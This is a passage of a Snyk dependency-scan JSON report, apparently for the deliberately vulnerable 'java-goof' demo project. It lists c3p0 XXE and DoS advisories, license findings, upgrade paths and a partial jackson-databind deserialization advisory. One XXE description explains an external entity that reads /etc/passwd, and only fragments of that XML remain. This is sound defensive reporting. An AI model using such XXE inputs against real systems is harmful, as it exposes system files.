Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", + "epssDetails": { + "percentile": "0.78365", + "probability": "0.00585", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-20433" + ], + "CWE": [ + "CWE-611" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:17:58.383761Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-12-24T13:29:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-07-21T14:22:18Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:09.230623Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "severityWithCritical": "critical" + }, + { + "id": "SNYK-JAVA-C3P0-461018", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://hackerone.com/reports/509315", + "title": "POC: Hackerone Report" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:14.895852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", + "epssDetails": { + "percentile": "0.90102", + "probability": "0.02457", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-5427" + ], + "CWE": [ + "CWE-776" + ], + "GHSA": [ + "GHSA-84p2-vf58-xhxv" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:24:58.914446Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-04-22T22:18:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-04-22T22:18:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:53.496388Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "severityWithCritical": "high" + }, + { + "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", + "type": "license", + "title": "LGPL-3.0 license", + "semver": { + "vulnerable": [ + "[0,)" + ] + }, + "license": "LGPL-3.0", + "language": "java", + "description": "LGPL-3.0 license", + "packageName": "c3p0:c3p0", + "creationTime": "2024-06-18T02:35:42.971Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T02:35:42.971Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + "[3.3.0.CR1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-core", + "creationTime": "2024-06-18T19:09:16.096Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T19:09:16.096Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.5.4,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.aspectj:aspectjweaver", + "creationTime": "2024-06-18T21:24:04.112Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T21:24:04.112Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.aspectj:aspectjweaver@1.8.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.aspectj:aspectjweaver", + "version": "1.8.2", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", + "type": "license", + "title": "LGPL-2.1 license", + "semver": { + "vulnerable": [ + "[4.0.0.CR1,)" + ] + }, + "license": "LGPL-2.1", + "language": "java", + "description": "LGPL-2.1 license", + "packageName": "org.hibernate.common:hibernate-commons-annotations", + "creationTime": "2024-06-18T11:03:46.980Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:03:46.980Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate.common:hibernate-commons-annotations", + "version": "4.0.5.Final", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.0.0.Final,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "creationTime": "2024-06-18T12:03:42.953Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T12:03:42.953Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "version": "1.0.0.Final", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + "[3.5.0.Beta-1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-entitymanager", + "creationTime": "2024-06-18T11:52:01.913Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:52:01.913Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-entitymanager@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-entitymanager", + "version": "4.3.7.Final", + "severityWithCritical": "medium" + } + ], + "upgrade": { + "org.hibernate:hibernate-core@4.3.7.Final": { + "upgradeTo": "org.hibernate:hibernate-core@5.4.24.Final", + "upgrades": [ + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1", + "dom4j:dom4j@1.6.1" + ], + "vulns": [ + "SNYK-JAVA-ORGHIBERNATE-1041788", + "SNYK-JAVA-ORGHIBERNATE-584563", + "SNYK-JAVA-DOM4J-174153", + "SNYK-JAVA-DOM4J-2812975" + ] + }, + "org.hsqldb:hsqldb@2.3.2": { + "upgradeTo": "org.hsqldb:hsqldb@2.7.1", + "upgrades": [ + "org.hsqldb:hsqldb@2.3.2" + ], + "vulns": [ + "SNYK-JAVA-ORGHSQLDB-3040860" + ] + }, + "org.springframework:spring-context@3.2.6.RELEASE": { + "upgradeTo": "org.springframework:spring-context@5.2.24.RELEASE", + "upgrades": [ + "org.springframework:spring-expression@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE" + ], + "vulns": [ + "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325" + ] + } + }, + "patch": {}, + "ignore": {}, + "pin": {} + }, + "filesystemPolicy": false, + "filtered": { + "ignore": [], + "patch": [] + }, + "uniqueCount": 22, + "projectName": "io.github.snyk:todolist-core", + "foundProjectCount": 7, + "displayTargetFile": "todolist-goof/todolist-core/pom.xml", + "hasUnknownVersions": false, + "path": "/Users/austindoll/Documents/GitHub/java-goof" + }, + { + "vulnerabilities": [ + { + "id": "SNYK-JAVA-C3P0-461017", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:45.369849Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.803024Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:09.230623Z" + } + ], + "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", + "epssDetails": { + "percentile": "0.78365", + "probability": "0.00585", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-20433" + ], + "CWE": [ + "CWE-611" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:17:58.383761Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-12-24T13:29:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-07-21T14:22:18Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:09.230623Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2" + }, + { + "id": "SNYK-JAVA-C3P0-461018", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", + "className": "C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "c3p0:c3p0", + "references": [ + { + "url": "https://hackerone.com/reports/509315", + "title": "POC: Hackerone Report" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:14.895852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", + "epssDetails": { + "percentile": "0.90102", + "probability": "0.02457", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-5427" + ], + "CWE": [ + "CWE-776" + ], + "GHSA": [ + "GHSA-84p2-vf58-xhxv" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:24:58.914446Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-04-22T22:18:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-04-22T22:18:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:53.496388Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2" + }, + { + "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", + "type": "license", + "title": "LGPL-3.0 license", + "semver": { + "vulnerable": [ + "[0,)" + ] + }, + "license": "LGPL-3.0", + "language": "java", + "description": "LGPL-3.0 license", + "packageName": "c3p0:c3p0", + "creationTime": "2024-06-18T02:35:42.971Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T02:35:42.971Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2798", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:47.492797Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.721313Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:03.263794Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.492797Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.721313Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.pastdev.httpcomponents.configuration.JndiConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on 